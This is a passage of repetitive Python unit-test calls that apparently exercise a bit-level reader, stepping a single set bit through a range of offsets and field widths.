_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 15, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 14, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 13, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 12, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 11, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 10, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 9, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 8, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 7, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 6, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 5, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 4, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 3, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 2, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 1, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 16, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 15, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 14, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 13, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 12, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 11, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 10, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 9, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 8, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 7, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 6, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 5, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 4, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 3, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 2, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 1, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 16, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 15, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 14, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 13, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 12, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 11, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 10, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 9, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 8, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 7, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 6, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 5, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 4, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 3, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 2, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 1, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 16, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 15, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 14, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 13, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 12, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 11, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 10, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 9, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 8, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 7, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 6, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 5, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 4, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 3, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 2, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 1, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 15, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 14, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 13, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 12, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 11, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 10, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 9, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 8, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 7, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 6, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 5, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 4, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 3, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 1, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 16, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 15, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 14, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 13, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 12, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 11, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 10, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 9, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 8, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 7, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 6, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 5, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 4, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 3, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 2, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 1, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 16, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 15, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 14, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 13, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 12, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 11, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 10, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 9, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 8, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 7, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 6, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 5, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 4, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 3, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 2, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 1, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 16, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 15, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 14, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 13, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 12, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 11, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 10, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 9, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 32, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 31, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 30, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 29, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 28, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 27, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 26, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 25, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 24, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 23, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 22, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 21, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 20, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 19, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 18, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 17, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 16, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 15, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 14, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 13, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 12, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 11, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 10, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 9, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 32, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 31, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 30, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 29, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 28, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 27, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 26, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 25, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 24, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 23, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 22, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 21, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 20, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 19, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 18, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 17, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 16, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 15, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 14, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 13, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 12, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 11, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 10, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 9, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 8, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 7, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 6, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 5, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 4, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 3, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 2, False, 1)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 1, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 32, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 31, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 30, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 29, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 28, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 27, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 26, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 25, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 24, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 23, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 22, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 21, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 20, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 19, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 18, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 17, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 16, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 15, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 14, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 13, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 12, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 11, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 10, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 9, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 8, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 7, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 6, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 5, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 4, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 3, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 2, False, 1)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 1, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 32, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 31, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 30, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 29, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 28, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 27, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 26, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 25, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 24, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 23, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 22, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 21, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 20, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 19, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 18, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 17, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 16, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 15, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 14, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 13, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 12, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 11, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 10, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 9, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 8, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 7, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 6, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 5, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 4, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 3, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 2, False, 1)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 1, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 32, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 31, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 30, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 29, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 28, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 27, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 26, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 25, False, 1)
